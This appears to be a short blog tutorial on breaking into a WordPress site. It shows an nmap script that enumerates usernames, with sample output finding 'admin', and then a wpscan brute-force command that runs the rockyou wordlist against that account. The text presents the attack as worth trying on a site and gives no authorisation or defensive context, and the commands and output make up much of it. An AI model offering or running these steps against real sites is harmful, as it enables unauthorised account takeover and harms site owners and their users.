The wpscan utility may be used to brute force a WordPress password very easily.
But firstly, we need the WordPress username. Get it like this. Using Nmap. As Nmap supports user enumeration for WordPress, this is easy.
ubuntu ~ $ nmap -sV --script http-wordpress-enum --script-args limit=195 somewordpresssite.com Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-21 02:14 UTC Nmap scan report for somewordpresssite.com (XXX.XXX.XXX.XX) Host is up (0.0036s latency). rDNS record for XXX.XXX.XXX.XX: host17.somenet.com Not shown: 941 filtered ports, 55 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 80/tcp open http Apache httpd | http-wordpress-enum: | Username found: admin |_Search stopped at ID #195. Increase the upper limit if necessary with 'http-wordpress-enum.limit' 443/tcp open ssl/http Apache httpd 8022/tcp open ssh OpenSSH 5.3 (protocol 2.0) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 508.92 seconds |
Now that we have the username of ‘admin’, we can try and crack the password by going through a large wordlist and trying all of the possible passwords to attempt to gain access to the account.
┌─[✗]─[root@parrot]─[/home/user]:48:01 <=== > (802660 / 14344393) 5.59% ETA: 47:14:38 └──╼ #wpscan -u somewordpresssite.com --threads 20 --wordlist /home/user/rockyou.txt --username admin |
This will take a very long time, and will only work if the password is in the wordlist. So you would need a massive 13 Gigabyte wordlist, or more to crack a stronger password. But if it is very long, then a more massive wordlist would be required. But you could get lucky with this attack. Well worth trying, unless the site has Cloudflare protection.